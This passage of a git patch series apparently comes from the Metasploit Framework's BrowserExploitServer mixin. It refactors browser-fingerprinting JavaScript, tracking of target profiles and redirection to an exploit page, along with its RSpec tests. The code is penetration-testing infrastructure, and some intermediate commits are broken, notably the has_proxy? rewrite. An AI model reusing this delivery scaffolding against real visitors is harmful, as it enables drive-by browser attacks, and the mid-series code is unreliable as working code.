     it "should update my target profile's :os_name information" do
       server.start_service
-      server.init_profile("random")
-      profile = server.get_profile("random")
+      server.init_profile(random)
+      profile = server.get_profile(random)
       server.update_profile(profile, :os_name, 'Linux')
-      profile = server.get_profile("random")
-      os_name = profile['random'][:os_name]
+      profile = server.get_profile(random)
+      os_name = profile[random][:os_name]
       os_name.should eq('Linux')
     end
   end

From f98587181d0bea126697acac346fa3730c73caff Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Mon, 4 Nov 2013 10:55:47 -0600
Subject: [PATCH 27/73] let 'linux'

---
 spec/lib/msf/core/exploit/browser/server_spec.rb | 10 +++++++---
 1 file changed, 7 insertions(+), 3 deletions(-)

diff --git a/spec/lib/msf/core/exploit/browser/server_spec.rb b/spec/lib/msf/core/exploit/browser/server_spec.rb
index de007ff0f8..68f07dc620 100644
--- a/spec/lib/msf/core/exploit/browser/server_spec.rb
+++ b/spec/lib/msf/core/exploit/browser/server_spec.rb
@@ -23,6 +23,10 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
     "random"
   end
 
+  let(:linux) do
+    "linux"
+  end
+
   before do
     Rex::ServiceManager.stub(:start => service_double)
   end
@@ -81,7 +85,7 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
     it "should have identify :os_name as a requirement not met" do
       fake_profile = {
         "rMWwSAwBHLoESpHbEGbsv" => {
-          :os_name   => "Linux"
+          :os_name   => linux
         }}
 
       server.start_service
@@ -121,10 +125,10 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
       server.start_service
       server.init_profile(random)
       profile = server.get_profile(random)
-      server.update_profile(profile, :os_name, 'Linux')
+      server.update_profile(profile, :os_name, linux)
       profile = server.get_profile(random)
       os_name = profile[random][:os_name]
-      os_name.should eq('Linux')
+      os_name.should eq(linux)
     end
   end
 

From 9a8e45f451f19e87f1993586a75452285b19b7fb Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Mon, 4 Nov 2013 10:57:01 -0600
Subject: [PATCH 28/73] be_nil

---
 spec/lib/msf/core/exploit/browser/server_spec.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/spec/lib/msf/core/exploit/browser/server_spec.rb b/spec/lib/msf/core/exploit/browser/server_spec.rb
index 68f07dc620..81ce8428d3 100644
--- a/spec/lib/msf/core/exploit/browser/server_spec.rb
+++ b/spec/lib/msf/core/exploit/browser/server_spec.rb
@@ -109,14 +109,14 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
       server.start_service
       server.init_profile(random)
       p = server.get_profile("non_existent_profile")
-      p.should eq(nil)
+      p.should be_nil
     end
 
     it "should return a profile if found" do
       server.start_service
       server.init_profile(random)
       p = server.get_profile(random)
-      p[random].should_not eq(nil)
+      p[random].should_not be_nil
     end
   end
 

From bed2ea9e39b3bdf0ae63f92cabd2d999c40d2215 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Mon, 4 Nov 2013 11:02:05 -0600
Subject: [PATCH 29/73] rename some stuff

---
 .../msf/core/exploit/browser/server_spec.rb   | 30 +++++++++----------
 1 file changed, 15 insertions(+), 15 deletions(-)

diff --git a/spec/lib/msf/core/exploit/browser/server_spec.rb b/spec/lib/msf/core/exploit/browser/server_spec.rb
index 81ce8428d3..997ae109f0 100644
--- a/spec/lib/msf/core/exploit/browser/server_spec.rb
+++ b/spec/lib/msf/core/exploit/browser/server_spec.rb
@@ -19,11 +19,11 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
     service
   end
 
-  let(:random) do
+  let(:profile_name) do
     "random"
   end
 
-  let(:linux) do
+  let(:expected_os_name) do
     "linux"
   end
 
@@ -85,7 +85,7 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
     it "should have identify :os_name as a requirement not met" do
       fake_profile = {
         "rMWwSAwBHLoESpHbEGbsv" => {
-          :os_name   => linux
+          :os_name   => expected_os_name
         }}
 
       server.start_service
@@ -98,37 +98,37 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
   describe ".init_profile" do
     it "should initialize an empety profile for tag 'random'" do
       server.start_service
-      server.init_profile(random)
+      server.init_profile(profile_name)
       ivar_target_profile = server.instance_variable_get(:@target_profiles).first
-      ivar_target_profile[random].should eq({})
+      ivar_target_profile[profile_name].should eq({})
     end
   end
 
   describe ".get_profile" do
     it "should return nil when a profile isn't found" do
       server.start_service
-      server.init_profile(random)
+      server.init_profile(profile_name)
       p = server.get_profile("non_existent_profile")
       p.should be_nil
     end
 
     it "should return a profile if found" do
       server.start_service
-      server.init_profile(random)
-      p = server.get_profile(random)
-      p[random].should_not be_nil
+      server.init_profile(profile_name)
+      p = server.get_profile(profile_name)
+      p[profile_name].should_not be_nil
     end
   end
 
   describe ".update_profile" do
     it "should update my target profile's :os_name information" do
       server.start_service
-      server.init_profile(random)
-      profile = server.get_profile(random)
-      server.update_profile(profile, :os_name, linux)
-      profile = server.get_profile(random)
-      os_name = profile[random][:os_name]
-      os_name.should eq(linux)
+      server.init_profile(profile_name)
+      profile = server.get_profile(profile_name)
+      server.update_profile(profile, :os_name, expected_os_name)
+      profile = server.get_profile(profile_name)
+      os_name = profile[profile_name][:os_name]
+      os_name.should eq(expected_os_name)
     end
   end
 

From 03ee1d070e58425fed2daeb482b1b16fb5e18aba Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Mon, 4 Nov 2013 11:06:32 -0600
Subject: [PATCH 30/73] fix server.start_service

---
 spec/lib/msf/core/exploit/browser/server_spec.rb | 14 ++++----------
 1 file changed, 4 insertions(+), 10 deletions(-)

diff --git a/spec/lib/msf/core/exploit/browser/server_spec.rb b/spec/lib/msf/core/exploit/browser/server_spec.rb
index 997ae109f0..07e62e0934 100644
--- a/spec/lib/msf/core/exploit/browser/server_spec.rb
+++ b/spec/lib/msf/core/exploit/browser/server_spec.rb
@@ -31,9 +31,12 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
     Rex::ServiceManager.stub(:start => service_double)
   end
 
+  before(:each) do
+    server.start_service
+  end
+
   describe ".get_module_resource" do
     it "should give me a URI to access the exploit page" do
-      server.start_service
       ivar_exploit_page = server.instance_variable_get(:@exploit_receiver_page)
       module_resource = server.get_module_resource
       module_resource.should match(ivar_exploit_page)
@@ -46,7 +49,6 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
     end
 
     it "should begin with an empty hash by default" do
-      server.start_service 
       actual_requirements.should eq({})
     end
 
@@ -56,7 +58,6 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
         :os_name => /win/i
       }
 
-      server.start_service
       server.requirements(opts)
       actual_requirements.should eq(opts)
     end
@@ -78,7 +79,6 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
           :tried     => true
         }}
 
-        server.start_service
         server.has_bad_requirements?(fake_profile).should eq([])
     end
 
@@ -88,7 +88,6 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
           :os_name   => expected_os_name
         }}
 
-      server.start_service
       server.requirements({:os_name=>/win/i})
       baddies = server.has_bad_requirements?(fake_profile)
       baddies.should eq([:os_name])
@@ -97,7 +96,6 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
 
   describe ".init_profile" do
     it "should initialize an empety profile for tag 'random'" do
-      server.start_service
       server.init_profile(profile_name)
       ivar_target_profile = server.instance_variable_get(:@target_profiles).first
       ivar_target_profile[profile_name].should eq({})
@@ -106,14 +104,12 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
 
   describe ".get_profile" do
     it "should return nil when a profile isn't found" do
-      server.start_service
       server.init_profile(profile_name)
       p = server.get_profile("non_existent_profile")
       p.should be_nil
     end
 
     it "should return a profile if found" do
-      server.start_service
       server.init_profile(profile_name)
       p = server.get_profile(profile_name)
       p[profile_name].should_not be_nil
@@ -122,7 +118,6 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
 
   describe ".update_profile" do
     it "should update my target profile's :os_name information" do
-      server.start_service
       server.init_profile(profile_name)
       profile = server.get_profile(profile_name)
       server.update_profile(profile, :os_name, expected_os_name)
@@ -134,7 +129,6 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
 
   describe ".get_detection_html" do
     it "should return the detection code that the client will get" do
-      server.start_service
       html = server.get_detection_html
       html.should_not eq('')
     end

From dc076273f714c946d06c0314986c3f15a6780c5e Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Mon, 4 Nov 2013 11:12:26 -0600
Subject: [PATCH 31/73] Add another test for profile

---
 spec/lib/msf/core/exploit/browser/server_spec.rb | 6 ++++++
 1 file changed, 6 insertions(+)

diff --git a/spec/lib/msf/core/exploit/browser/server_spec.rb b/spec/lib/msf/core/exploit/browser/server_spec.rb
index 07e62e0934..d57f4878c2 100644
--- a/spec/lib/msf/core/exploit/browser/server_spec.rb
+++ b/spec/lib/msf/core/exploit/browser/server_spec.rb
@@ -103,6 +103,12 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
   end
 
   describe ".get_profile" do
+    it "should only contain one hash for each profile" do
+      server.init_profile(profile_name)
+      p = server.get_profile(profile_name)
+      p.length.should eq(1)
+    end
+
     it "should return nil when a profile isn't found" do
       server.init_profile(profile_name)
       p = server.get_profile("non_existent_profile")

From 0337e6ff54842c16840c5839fc44834123ff7d79 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Mon, 4 Nov 2013 12:09:59 -0600
Subject: [PATCH 32/73] Do yard documentation

---
 lib/msf/core/exploit/browser/server.rb | 64 ++++++++++++++++++++++----
 1 file changed, 55 insertions(+), 9 deletions(-)

diff --git a/lib/msf/core/exploit/browser/server.rb b/lib/msf/core/exploit/browser/server.rb
index 331b672828..a40b0c9b1b 100644
--- a/lib/msf/core/exploit/browser/server.rb
+++ b/lib/msf/core/exploit/browser/server.rb
@@ -52,7 +52,7 @@ module Msf
       @requirements = {}
 
       @info_receiver_page     = "info"
-      @exploit_receiver_page  = "exploit"
+      @exploit_receiver_page  = "explo it"
       @noscript_receiver_page = "noscript"
 
     register_options(
@@ -64,22 +64,32 @@ module Msf
     #
     # Syncs a block of code
     #
+    # @param block [Proc] Block of code to sync
+    #
     def sync(&block)
       (@mutex ||= Mutex.new).synchronize(&block)
     end
 
     #
-    # Returns the resource (URI) to the module
-    # Similar to get_resource, this method will allow whatever is requesting this URI to access
-    # on_request_exploit
+    # Returns the resource (URI) to the module to allow access to on_request_exploit
+    #
+    # @return [String] URI to the exploit page
     #
     def get_module_resource
       "#{get_resource.chomp("/")}/#{@exploit_receiver_page}"
     end
 
     #
-    # Defines requirements by the module.
-    # The keys the module can define are the same as the ones in @target_profiles
+    # Defines requirements by the module. Main keys are the same as the ones in @target_profiles.
+    #
+    # @param reqs [Hash]
+    # @option reqs :source The data source. Either 'script' or 'headers'
+    # @option reqs :ua_name The name of the browser
+    # @option reqs :ua_ver The version of the browser
+    # @option reqs :os_name The name of the operating system
+    # @option reqs :language The language of the system
+    # @option reqs :arch The architecture
+    # @option reqs :prxy Indicates whether a proxy is used or not by the browser
     #
     def requirements(reqs={})
       @requirements = reqs
@@ -88,6 +98,9 @@ module Msf
     #
     # Returns an array of items that do not meet the requirements
     #
+    # @param target_profile [Hash] The profile to check
+    # @return [Array] An array of requirements not met
+    #
     def has_bad_requirements?(target_profile)
       profile = target_profile[target_profile.first[0]]
       bad_reqs = []
@@ -106,6 +119,9 @@ module Msf
     #
     # Returns the target profile based on the tag
     #
+    # @param tag [String] Either a cookie or IP + User-Agent
+    # @return [Hash] The profile found. If not found, returns nil
+    #
     def get_profile(tag)
       sync do
         @target_profiles.each do |profile|
@@ -119,6 +135,10 @@ module Msf
     #
     # Updates information for a specific profile
     #
+    # @param target_profile [Hash] The profile to update
+    # @param key [Symbol] The symbol to use for the hash
+    # @param value [String] The value to assign
+    #
     def update_profile(target_profile, key, value)
       sync do
         target_profile[target_profile.first[0]][key] = value
@@ -128,6 +148,8 @@ module Msf
     #
     # Initializes a profile
     #
+    # @param tag [String] A unique string as a way to ID the profile
+    #
     def init_profile(tag)
       sync do
         @target_profiles << {tag => {}}
@@ -140,6 +162,8 @@ module Msf
     # If the header is empty (possible if the browser has cookies disabled),
     # then it will return a tag based on IP + the user-agent.
     #
+    # @param request [Rex::Proto::Http::Request] The HTTP request sent by the browser
+    #
     def retreive_tag(request)
       tag = request.headers['Cookie'].to_s
 
@@ -155,7 +179,10 @@ module Msf
 
     #
     # Registers target information to @target_profiles
-    # Acceptable sources include :script, and :headers
+    #
+    # @param source [Symbol] Either :script, or :headers
+    # @param cli [Socket] Socket for the browser
+    # @param request [Rex::Proto::Http::Request] The HTTP request sent by the browser
     #
     def process_browser_info(source, cli, request)
       tag = retreive_tag(request)
@@ -203,6 +230,9 @@ module Msf
     #
     # Checks if the target is running a proxy
     #
+    # @param request [Rex::Proto::Http::Request] The HTTP request sent by the browser
+    # @return [Boolean] True if found, otherwise false
+    #
     def has_proxy?(request)
       proxy_list =
       [
@@ -220,6 +250,8 @@ module Msf
     #
     # Returns the code for client-side detection
     #
+    # @param [String] Returns the HTML for detection
+    #
     def get_detection_html
       js = ::Rex::Exploitation::JSObfu.new %Q|
       #{js_base64}
@@ -267,6 +299,9 @@ module Msf
     #
     # Handles exploit stages.
     #
+    # @param cli [Socket] Socket for the browser
+    # @param request [Rex::Proto::Http::Request] The HTTP request sent by the browser
+    #
     def on_request_uri(cli, request)
       case request.uri
       when /^#{get_resource}$/
@@ -328,20 +363,31 @@ module Msf
     #
     # Overriding method. The module should override this.
     #
+    # @param cli [Socket] Socket for the browser
+    # @param request [Rex::Proto::Http::Request] The HTTP request sent by the browser
+    # @param browser_info [Hash] The target profile
+    #
     def on_request_exploit(cli, request, browser_info)
     end
 
     #
     # Converts an ERB-based exploit template into HTML, and sends to client
     #
+    # @param cli [Socket] Socket for the browser
+    # @param template [String] HTML
+    # @param headers [Hash] The custom HTTP headers to include in the response
+    #
     def send_exploit_html(cli, template, headers={})
       html = ERB.new(template).result
       send_response(cli, html)
     end
 
     #
-    # Generates a target-specific payload.
-    # Should be called by the module.
+    # Generates a target-specific payload, should be called by the module
+    #
+    # @param cli [Socket] Socket for the browser
+    # @param browser_info [Hash] The target profile
+    # @return [String] The payload
     #
     def get_payload(cli, browser_info)
       tag      = browser_info.first[0]

From c3d9f4064cfe308cfef223248acbeb24de4e4a5f Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Mon, 4 Nov 2013 12:10:39 -0600
Subject: [PATCH 33/73] They are symbols not strings

---
 lib/msf/core/exploit/browser/server.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/lib/msf/core/exploit/browser/server.rb b/lib/msf/core/exploit/browser/server.rb
index a40b0c9b1b..7e777394c4 100644
--- a/lib/msf/core/exploit/browser/server.rb
+++ b/lib/msf/core/exploit/browser/server.rb
@@ -24,8 +24,8 @@ module Msf
       # {
       #   'cookie' =>
       #   {
-      #     'os_name'   => 'Windows',
-      #     'os_flavor' => 'something'
+      #     :os_name   => 'Windows',
+      #     :os_flavor => 'something'
       #     ...... etc ......
       #   }
       # }

From 016e686bcf9ec397bff7c712691c347f683346ee Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Mon, 4 Nov 2013 12:28:22 -0600
Subject: [PATCH 34/73] super chomp

---
 lib/msf/core/exploit/browser/server.rb | 19 +++++++++++++------
 1 file changed, 13 insertions(+), 6 deletions(-)

diff --git a/lib/msf/core/exploit/browser/server.rb b/lib/msf/core/exploit/browser/server.rb
index 7e777394c4..d6a2055ed2 100644
--- a/lib/msf/core/exploit/browser/server.rb
+++ b/lib/msf/core/exploit/browser/server.rb
@@ -61,6 +61,13 @@ module Msf
       ], Exploit::Remote::BrowserExploitServer)
     end
 
+    #
+    # Removes the trailing slash for get_resource
+    #
+    def get_resource
+      super.chomp("/")
+    end
+
     #
     # Syncs a block of code
     #
@@ -76,7 +83,7 @@ module Msf
     # @return [String] URI to the exploit page
     #
     def get_module_resource
-      "#{get_resource.chomp("/")}/#{@exploit_receiver_page}"
+      "#{get_resource}/#{@exploit_receiver_page}"
     end
 
     #
@@ -278,8 +285,8 @@ module Msf
           "office"    : window.addons_detect.getMsOfficeVersion()
         };
         var query = objToQuery(d);
-        postInfo("#{get_resource.chomp("/")}/#{@info_receiver_page}/", query);
-        window.location = "#{get_resource.chomp("/")}/#{@exploit_receiver_page}/";
+        postInfo("#{get_resource}/#{@info_receiver_page}/", query);
+        window.location = "#{get_resource}/#{@exploit_receiver_page}/";
       }
       |
 
@@ -290,8 +297,8 @@ module Msf
       #{js}
       </script>
       <noscript>
-      <img style="visibility:hidden" src="#{get_resource.chomp("/")}/#{@noscript_receiver_page}/">
-      <meta http-equiv="refresh" content="1; url=#{get_resource.chomp("/")}/#{@exploit_receiver_page}/">
+      <img style="visibility:hidden" src="#{get_resource}/#{@noscript_receiver_page}/">
+      <meta http-equiv="refresh" content="1; url=#{get_resource}/#{@exploit_receiver_page}/">
       </noscript>
       |
     end
@@ -309,7 +316,7 @@ module Msf
         # This is the information gathering stage
         #
         if get_profile(retreive_tag(request))
-          send_redirect(cli, "#{get_resource.chomp("/")}/#{@exploit_receiver_page}")
+          send_redirect(cli, "#{get_resource}/#{@exploit_receiver_page}")
           return
         end
 

From c6fb57048070e75f96a7f645336aff69400ceaa4 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Mon, 4 Nov 2013 12:35:04 -0600
Subject: [PATCH 35/73] Correct bad method naming

---
 lib/msf/core/exploit/browser/server.rb           | 4 ++--
 spec/lib/msf/core/exploit/browser/server_spec.rb | 6 +++---
 2 files changed, 5 insertions(+), 5 deletions(-)

diff --git a/lib/msf/core/exploit/browser/server.rb b/lib/msf/core/exploit/browser/server.rb
index d6a2055ed2..db68df6da6 100644
--- a/lib/msf/core/exploit/browser/server.rb
+++ b/lib/msf/core/exploit/browser/server.rb
@@ -108,7 +108,7 @@ module Msf
     # @param target_profile [Hash] The profile to check
     # @return [Array] An array of requirements not met
     #
-    def has_bad_requirements?(target_profile)
+    def get_bad_requirements(target_profile)
       profile = target_profile[target_profile.first[0]]
       bad_reqs = []
 
@@ -353,7 +353,7 @@ module Msf
           send_not_found(cli)
         else
           update_profile(profile, :tried, true)
-          bad_reqs = has_bad_requirements?(profile)
+          bad_reqs = get_bad_requirements(profile)
           if bad_reqs.empty?
             method(:on_request_exploit).call(cli, request, profile)
           else
diff --git a/spec/lib/msf/core/exploit/browser/server_spec.rb b/spec/lib/msf/core/exploit/browser/server_spec.rb
index d57f4878c2..cc62abb682 100644
--- a/spec/lib/msf/core/exploit/browser/server_spec.rb
+++ b/spec/lib/msf/core/exploit/browser/server_spec.rb
@@ -63,7 +63,7 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
     end
   end
 
-  describe ".has_bad_requirements?" do
+  describe ".get_bad_requirements" do
     it "should not contain any bad requirements" do
       fake_profile = {
         "rMWwSAwBHLoESpHbEGbsv" => {
@@ -79,7 +79,7 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
           :tried     => true
         }}
 
-        server.has_bad_requirements?(fake_profile).should eq([])
+        server.get_bad_requirements(fake_profile).should eq([])
     end
 
     it "should have identify :os_name as a requirement not met" do
@@ -89,7 +89,7 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
         }}
 
       server.requirements({:os_name=>/win/i})
-      baddies = server.has_bad_requirements?(fake_profile)
+      baddies = server.get_bad_requirements(fake_profile)
       baddies.should eq([:os_name])
     end
   end

From 25787fbaa7e39a23d352c7414075cde728cc5500 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Mon, 4 Nov 2013 12:52:15 -0600
Subject: [PATCH 36/73] Change has_proxy?

---
 lib/msf/core/exploit/browser/server.rb | 28 ++++++++++++++++----------
 1 file changed, 17 insertions(+), 11 deletions(-)

diff --git a/lib/msf/core/exploit/browser/server.rb b/lib/msf/core/exploit/browser/server.rb
index db68df6da6..45295589ae 100644
--- a/lib/msf/core/exploit/browser/server.rb
+++ b/lib/msf/core/exploit/browser/server.rb
@@ -241,17 +241,23 @@ module Msf
     # @return [Boolean] True if found, otherwise false
     #
     def has_proxy?(request)
-      proxy_list =
-      [
-        'HTTP_VIA', 'HTTP_X_FORWARDED_FOR', 'HTTP_FORWARDED_FOR', 'HTTP_X_FORWARDED',
-        'HTTP_FORWARDED', 'HTTP_CLIENT_IP', 'HTTP_FORWARDED_FOR_IP', 'VIA', 'X_FORWARDED_FOR',
-        'FORWARDED_FOR', 'X_FORWARDED', 'FORWARDED', 'CLIENT_IP', 'FORWARDED_FOR_IP',
-        'HTTP_PROXY_CONNECTION'
-      ].each do |name|
-        return true if request.headers[name]
-      end
-
-      false
+      %w{
+        HTTP_VIA
+        HTTP_X_FORWARDED_FOR
+        HTTP_FORWARDED_FOR
+        HTTP_X_FORWARDED
+        HTTP_FORWARDED
+        HTTP_CLIENT_IP
+        HTTP_FORWARDED_FOR_IP
+        VIA
+        X_FORWARDED_FOR
+        FORWARDED_FOR
+        X_FORWARDED
+        FORWARDED
+        CLIENT_IP
+        FORWARDED_FOR_IP
+        HTTP_PROXY_CONNECTION
+      }.include?(request.headers[name])
     end
 
     #

From e83f4e5120ca57025fdf909fdf0b1aa6dca59f66 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Mon, 4 Nov 2013 12:54:41 -0600
Subject: [PATCH 37/73] Use a warning

---
 lib/msf/core/exploit/browser/server.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/browser/server.rb b/lib/msf/core/exploit/browser/server.rb
index 45295589ae..f2209d0643 100644
--- a/lib/msf/core/exploit/browser/server.rb
+++ b/lib/msf/core/exploit/browser/server.rb
@@ -363,7 +363,7 @@ module Msf
           if bad_reqs.empty?
             method(:on_request_exploit).call(cli, request, profile)
           else
-            print_error("Exploit requirement(s) not met: #{bad_reqs * ', '}")
+            print_warning("Exploit requirement(s) not met: #{bad_reqs * ', '}")
             send_not_found(cli)
           end
         end

From 23e5a9f048f37b1fe3dc328838a2d9c0b41732ed Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Mon, 4 Nov 2013 12:54:52 -0600
Subject: [PATCH 38/73] Force on_request_exploit override

---
 lib/msf/core/exploit/browser/server.rb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/lib/msf/core/exploit/browser/server.rb b/lib/msf/core/exploit/browser/server.rb
index f2209d0643..9381b59eaa 100644
--- a/lib/msf/core/exploit/browser/server.rb
+++ b/lib/msf/core/exploit/browser/server.rb
@@ -381,6 +381,7 @@ module Msf
     # @param browser_info [Hash] The target profile
     #
     def on_request_exploit(cli, request, browser_info)
+      raise NoMethodError, "Module must define its own on_request_exploit method"
     end
 
     #

From d970925cbf1e0bf828653e037100e3c0a8146c74 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Mon, 4 Nov 2013 13:45:29 -0600
Subject: [PATCH 39/73] Fix encoding bug

---
 lib/msf/core/exploit/browser/server.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/lib/msf/core/exploit/browser/server.rb b/lib/msf/core/exploit/browser/server.rb
index 9381b59eaa..328418f228 100644
--- a/lib/msf/core/exploit/browser/server.rb
+++ b/lib/msf/core/exploit/browser/server.rb
@@ -275,9 +275,9 @@ module Msf
       function objToQuery(obj) {
         var q = [];
         for (var key in obj) {
-          q.push(key + '=' + obj[key]);
+          q.push(encodeURIComponent(key) + '=' + encodeURIComponent(obj[key]));
         }
-        return escape(Base64.encode(q.join('&')));
+        return Base64.encode(q.join('&'));
       }
 
       window.onload = function() {

From 9c8ecd2ede4c7ffa8337b8edd5cf7c3f7814ba7b Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Mon, 4 Nov 2013 14:06:42 -0600
Subject: [PATCH 40/73] Fix encoding order

---
 lib/msf/core/exploit/browser/server.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/browser/server.rb b/lib/msf/core/exploit/browser/server.rb
index 328418f228..b46108b682 100644
--- a/lib/msf/core/exploit/browser/server.rb
+++ b/lib/msf/core/exploit/browser/server.rb
@@ -203,7 +203,7 @@ module Msf
       when :script
         # Gathers target data from a POST request
         update_profile(target_profile, :source, 'script')
-        raw = Rex::Text.decode_base64(Rex::Text.uri_decode(request.body))
+        raw = Rex::Text.uri_decode(Rex::Text.decode_base64(request.body))
         raw.split('&').each do |item|
           k, v = item.scan(/(\w+)=(.*)/).flatten
           update_profile(target_profile, k.to_sym, v)

From ef57a3827486917bb06dbcfb0c99244b26cbbb5e Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Mon, 4 Nov 2013 16:47:15 -0600
Subject: [PATCH 41/73] Move documentation about profile structure

---
 lib/msf/core/exploit/browser/server.rb | 50 +++++++++++++-------------
 1 file changed, 25 insertions(+), 25 deletions(-)

diff --git a/lib/msf/core/exploit/browser/server.rb b/lib/msf/core/exploit/browser/server.rb
index b46108b682..ff1da4244f 100644
--- a/lib/msf/core/exploit/browser/server.rb
+++ b/lib/msf/core/exploit/browser/server.rb
@@ -20,30 +20,7 @@ module Msf
     def initialize(info={})
       super
 
-      # Profile structure:
-      # {
-      #   'cookie' =>
-      #   {
-      #     :os_name   => 'Windows',
-      #     :os_flavor => 'something'
-      #     ...... etc ......
-      #   }
-      # }
-      # A profile should at least have info about the following:
-      # tag      : Hash key. This is either an actual cookie, or a MD5 hash of target IP + user-agent
-      # :source  : The data source. Either from 'script', or 'headers'. The 'script' source
-      #             should be more accureate in some scenarios like browser compatibility mode
-      # :ua_name : The name of the browser
-      # :ua_ver  : The version of the browser
-      # :os_name : The name of the OS
-      # :language: The system's language
-      # :arch    : The system's arch
-      # :proxy   : Indicates whether proxy is used
-      #
-      # For more info about what the actual value might be for each key, see HttpServer.
-      #
-      # If the source is 'script', the profile might have even more information about plugins:
-      # 'office'  : The version of Microsoft Office (IE only)
+      # See get_profile's documenation to understand what @target_profiles stores
       @target_profiles = []
 
       # Requirements are conditions that the browser must have in order to be exploited.
@@ -124,7 +101,30 @@ module Msf
     end
 
     #
-    # Returns the target profile based on the tag
+    # Returns the target profile based on the tag. Each profile has the following structure:
+    # {
+    #   'cookie' =>
+    #   {
+    #     :os_name   => 'Windows',
+    #     :os_flavor => 'something'
+    #     ...... etc ......
+    #   }
+    # }
+    # A profile should at least have info about the following:
+    # tag      : Hash key. This is either an actual cookie, or a MD5 hash of target IP + user-agent
+    # :source  : The data source. Either from 'script', or 'headers'. The 'script' source
+    #             should be more accureate in some scenarios like browser compatibility mode
+    # :ua_name : The name of the browser
+    # :ua_ver  : The version of the browser
+    # :os_name : The name of the OS
+    # :language: The system's language
+    # :arch    : The system's arch
+    # :proxy   : Indicates whether proxy is used
+    #
+    # For more info about what the actual value might be for each key, see HttpServer.
+    #
+    # If the source is 'script', the profile might have even more information about plugins:
+    # 'office'  : The version of Microsoft Office (IE only)
     #
     # @param tag [String] Either a cookie or IP + User-Agent
     # @return [Hash] The profile found. If not found, returns nil

From 054a525f35966ea2e21c74af2b7b38c414ac858c Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Mon, 4 Nov 2013 17:46:36 -0600
Subject: [PATCH 42/73] Change profile data structure

---
 lib/msf/core/exploit/browser/server.rb        | 55 ++++++++-----------
 .../msf/core/exploit/browser/server_spec.rb   | 15 ++---
 .../exploits/test/browserexploitserver.rb     | 13 ++---
 3 files changed, 33 insertions(+), 50 deletions(-)

diff --git a/lib/msf/core/exploit/browser/server.rb b/lib/msf/core/exploit/browser/server.rb
index ff1da4244f..7815529b51 100644
--- a/lib/msf/core/exploit/browser/server.rb
+++ b/lib/msf/core/exploit/browser/server.rb
@@ -21,7 +21,7 @@ module Msf
       super
 
       # See get_profile's documenation to understand what @target_profiles stores
-      @target_profiles = []
+      @target_profiles = {}
 
       # Requirements are conditions that the browser must have in order to be exploited.
       # They must be defined by the module, and the mixin should check them before the
@@ -29,7 +29,7 @@ module Msf
       @requirements = {}
 
       @info_receiver_page     = "info"
-      @exploit_receiver_page  = "explo it"
+      @exploit_receiver_page  = "exploit"
       @noscript_receiver_page = "noscript"
 
     register_options(
@@ -82,11 +82,10 @@ module Msf
     #
     # Returns an array of items that do not meet the requirements
     #
-    # @param target_profile [Hash] The profile to check
+    # @param profile [Hash] The profile to check
     # @return [Array] An array of requirements not met
     #
-    def get_bad_requirements(target_profile)
-      profile = target_profile[target_profile.first[0]]
+    def get_bad_requirements(profile)
       bad_reqs = []
 
       @requirements.each do |k, v|
@@ -102,16 +101,13 @@ module Msf
 
     #
     # Returns the target profile based on the tag. Each profile has the following structure:
+    # 'cookie' =>
     # {
-    #   'cookie' =>
-    #   {
-    #     :os_name   => 'Windows',
-    #     :os_flavor => 'something'
-    #     ...... etc ......
-    #   }
+    #   :os_name   => 'Windows',
+    #   :os_flavor => 'something'
+    #   ...... etc ......
     # }
     # A profile should at least have info about the following:
-    # tag      : Hash key. This is either an actual cookie, or a MD5 hash of target IP + user-agent
     # :source  : The data source. Either from 'script', or 'headers'. The 'script' source
     #             should be more accureate in some scenarios like browser compatibility mode
     # :ua_name : The name of the browser
@@ -131,12 +127,8 @@ module Msf
     #
     def get_profile(tag)
       sync do
-        @target_profiles.each do |profile|
-          return profile if profile[tag]
-        end
+        return @target_profiles[tag]
       end
-
-      nil
     end
 
     #
@@ -148,7 +140,7 @@ module Msf
     #
